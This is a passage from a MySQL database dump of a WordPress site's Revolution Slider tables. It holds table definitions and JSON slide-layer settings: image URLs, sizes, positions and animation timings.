Sans\",\"fontSize\":{\"d\":{\"v\":\"15px\",\"e\":true},\"n\":{\"v\":\"15px\",\"e\":true},\"t\":{\"v\":\"15px\",\"e\":true},\"m\":{\"v\":\"15px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"1px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(4,8,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','[]','{\"version\":\"6.6.0\"}'),(5,15,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}'),(6,12,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}'),(7,16,'{\"static\":{\"isstatic\":true},\"runtime\":{\"collapsedGroups\":[]},\"title\":\"Global Layers\",\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(8,17,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}'),(9,18,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}'); /*!40000 ALTER TABLE `wpvt_revslider_static_slides` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_static_slides_bkp` -- DROP TABLE IF EXISTS `wpvt_revslider_static_slides_bkp`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_static_slides_bkp` ( `id` int(9) NOT NULL AUTO_INCREMENT, `slider_id` int(9) NOT NULL, `params` longtext NOT NULL, `layers` longtext NOT NULL, `settings` text NOT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_static_slides_bkp` -- LOCK TABLES `wpvt_revslider_static_slides_bkp` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_static_slides_bkp` DISABLE KEYS */; INSERT INTO `wpvt_revslider_static_slides_bkp` (`id`, `slider_id`, `params`, `layers`, `settings`) VALUES (1,2,'[]','[]','{\"version\":\"6.1.6\"}'),(2,6,'{\"static\":{\"overflow\":\"visible\"}}','[]','{\"0\":\"\",\"version\":\"6.1.6\"}'),(3,7,'{\"static\":{\"overflow\":\"visible\"}}','{\"7\":{\"text\":\"Image 13\",\"alias\":\"Image 13\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide1-graphic4.png\",\"imageId\":942},\"size\":{\"width\":{\"d\":{\"v\":\"307px\",\"e\":true},\"n\":{\"v\":\"186\",\"e\":true},\"t\":{\"v\":\"186\"},\"m\":{\"v\":\"123\",\"e\":true}},\"height\":{\"d\":{\"v\":\"326px\",\"e\":true},\"n\":{\"v\":\"198px\",\"e\":true},\"t\":{\"v\":\"198px\"},\"m\":{\"v\":\"131px\",\"e\":true}},\"originalWidth\":307,\"originalHeight\":326,\"aspectRatio\":{\"d\":{\"v\":0.94171779141104294819086817369679920375347137451171875},\"n\":{\"v\":0.94171779141104294819086817369679920375347137451171875},\"t\":{\"v\":0.94171779141104294819086817369679920375347137451171875},\"m\":{\"v\":0.94171779141104294819086817369679920375347137451171875}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"8\":{\"text\":\"Image 14\",\"alias\":\"Image 14\",\"uid\":8,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide1-graphic1.png\",\"imageId\":943},\"size\":{\"width\":{\"d\":{\"v\":\"593px\",\"e\":true},\"n\":{\"v\":\"517px\",\"e\":true},\"t\":{\"v\":\"517px\"},\"m\":{\"v\":\"404\",\"e\":true}},\"height\":{\"d\":{\"v\":\"342px\",\"e\":true},\"n\":{\"v\":\"298px\",\"e\":true},\"t\":{\"v\":\"298px\"},\"m\":{\"v\":\"233px\",\"e\":true}},\"originalWidth\":593,\"originalHeight\":342,\"aspectRatio\":{\"d\":{\"v\":1.733918128654970747248853513156063854694366455078125},\"n\":{\"v\":1.733918128654970747248853513156063854694366455078125},\"t\":{\"v\":1.733918128654970747248853513156063854694366455078125},\"m\":{\"v\":1.733918128654970747248853513156063854694366455078125}}},\"position\":{\"x\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"5px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"15px\",\"e\":true},\"n\":{\"v\":\"31px\",\"e\":true},\"t\":{\"v\":\"15px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"9\":{\"text\":\"Image 15\",\"alias\":\"Image 15\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide1-graphic2.png\",\"imageId\":944},\"size\":{\"width\":{\"d\":{\"v\":\"74px\",\"e\":true},\"n\":{\"v\":\"74px\",\"e\":true},\"t\":{\"v\":\"74px\"},\"m\":{\"v\":\"45px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"67px\",\"e\":true},\"n\":{\"v\":\"67px\",\"e\":true},\"t\":{\"v\":\"67px\"},\"m\":{\"v\":\"41px\",\"e\":true}},\"originalWidth\":74,\"originalHeight\":67,\"aspectRatio\":{\"d\":{\"v\":1.1044776119402985870010525104589760303497314453125},\"n\":{\"v\":1.1044776119402985870010525104589760303497314453125},\"t\":{\"v\":1.1044776119402985870010525104589760303497314453125},\"m\":{\"v\":1.1044776119402985870010525104589760303497314453125}}},\"position\":{\"x\":{\"d\":{\"v\":\"4px\",\"e\":true},\"n\":{\"v\":\"5px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-152px\",\"e\":true},\"n\":{\"v\":\"-137px\",\"e\":true},\"t\":{\"v\":\"-153px\",\"e\":true},\"m\":{\"v\":\"-114px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"11\":{\"text\":\"Let Your Soul Glow\",\"alias\":\"Let Your Soul Glow\",\"uid\":11,\"media\":{\"imageUrl\":\"\"},\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"7px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"9px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-100px\",\"e\":true},\"n\":{\"v\":\"-74px\",\"e\":true},\"t\":{\"v\":\"-92px\",\"e\":true},\"m\":{\"v\":\"-73px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"m